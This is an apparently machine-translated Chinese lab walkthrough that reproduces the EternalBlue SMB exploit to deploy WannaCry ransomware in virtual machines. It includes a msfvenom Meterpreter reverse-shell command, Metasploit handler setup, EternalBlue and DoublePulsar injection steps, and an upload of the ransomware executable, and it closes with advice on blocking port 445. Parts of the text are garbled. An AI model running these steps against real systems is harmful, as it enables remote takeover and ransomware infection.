病毒“WannaCry”的再现(永远的蓝色)1)漏洞概要2 )漏洞的再现2.1再现环境2.3再现过程2.3.3攻击开始3 .结语4 .防止
1 .脆弱性概述
“永远的蓝色”利用Windows系统中的SMB漏洞获取系统的最高权限,该漏洞通过恶意代码扫描开放了445个端口的Windows系统。 扫描的Windows系统开机在线后,无需用户进行任何操作,即可共享漏洞上传wannacry勒索病毒,远程操作木马等恶意程序。
2 .错误再现2.1再现环境注意事项:复现过程请在虚拟机中运行,运行之前关闭虚拟机的文件共享,否则有可能感染真机,真机一旦被感染,你就真的真的“想哭”(wannacry)了
2.2.1环境构建:
攻击机1:kali-Linux-2018.2-i386 IP:192.168.15.176攻击机2:win _ server _ 2003 IP:192.168.15.154靶机: win_07
python 2.6:https://www.python.org/download/releases/2.6/python 32-221.win32-py 2.6:https://source forge.net/pret
步骤1 :安装Python26,设置环境变量,并将Python26的安装路径添加到path。 (例如,安装路径为c:(python26 ),添加到path; c:(python26注:前置分号为英文)第2步(安装2(python32-221.win32-py2.6,傻瓜式安装第3步) Shadowbroker-master 在记事本中打开Windows文件夹中的Fuzzbunch.xml文件,并更改资源dir和LOogDir的路径;
第四步(运行永远的蓝色工具,出现下一个界面后,恭喜工具安装成功。
2.3复现流程2.3.1扫描靶机是否打开445端口
2.3.2 kali生成后门文件(文件类型:dll ) ) )。
3.2.1 :使用kali的msfvenom工具:其中-p :指定使用的模块类型; LSHOT :指定本地IP; LPORT :指定本地端口(具体使用,自助) MSF venom-p windows/x64/meter preter/reverse _ tcpl host=192.168.15.176 lpost
3.2.2向攻击机2上传dll文件时,可以使用SecureCRT或xshell等外部软件; 或者简单粗暴地使用,直接在虚拟机上安装wmvare tools,直接傻傻地往返复制就可以了。
2.3.3攻击开始3.3.1攻击机2----"永远的蓝色:
1 .默认目标IP地址: Default Targer IP Address:目标IP 2 .默认回弹IP地址: Default Callback IP Address:攻击者1IP地址3 tion [yes] :no 4.新建项目: Create a New Project 5.命名项目: New Project Name:test1 6 .所有其他选项在默认情况下均为直接ew
3.3.2攻击机2----加载"永恒之蓝"模块,获取靶机系统权限。
1 .加载永恒蓝: use Eternalblue 2.靶机操作系统类型,攻击前通过收集信息靶机选择win7(直接用nmap扫描即可获得靶机信息)、对应号码3 .模式模式模式模式
3.3.3攻击机1----kali开启拦截,等待回壳
1.MSF console2. handler:use exploit/multi/handler3. pay LOD :设置setpayloadwindows/x64/meter preter/reverse _ TCP
3.3.4攻击机2----win_server_2003双脉冲(Doublepulsar )注入:
1 .加载双输出3360用户双输出2。 使用协议。 中小企业(关于中小企业和RDP,自驾游百度)3.使用后门的方法。 选择规则4。 配置dll路径。 c:((ABC.dll5. )。
3.3.5攻击机1----上传并运行威胁病毒:
1 .向靶机上传文本类文件,验证实验2.kali上传威胁病毒: upload /root/wcry.exe c:\ 3.靶机cmd:shell 4.反弹外壳
3.3.6回到靶机,享受靶机被蹂躏的喜悦吧
3 .结语本次实验对“永恒之蓝”进行wannacry攻击的过程进行复现,本次复现过程在虚拟机中进行,不可在真机中运行,实验前一定关闭虚拟机的文件文件共享功能;本次复现过程旨在认识勒索病毒攻击靶机的过程,通过对病毒入侵的过程进行复现,了解病毒的危害,加强防范意识。
4 .防范关闭虚拟机共享
勒索病毒主要通过445端口入侵计算机,以下以445为例关闭端口
控制面板windows防火墙-高级选项入站规则1 .新建规则,选择端口2 .指定端口号3 .选择连接块4 .选择所有配置文件5 .规则
自己录制了一个勒索病毒大战彩虹猫的视频,有兴趣的小伙伴可以自行去看一下:https://v.youku.com/v_show/id_XNDMwNDU1NTE2MA==.html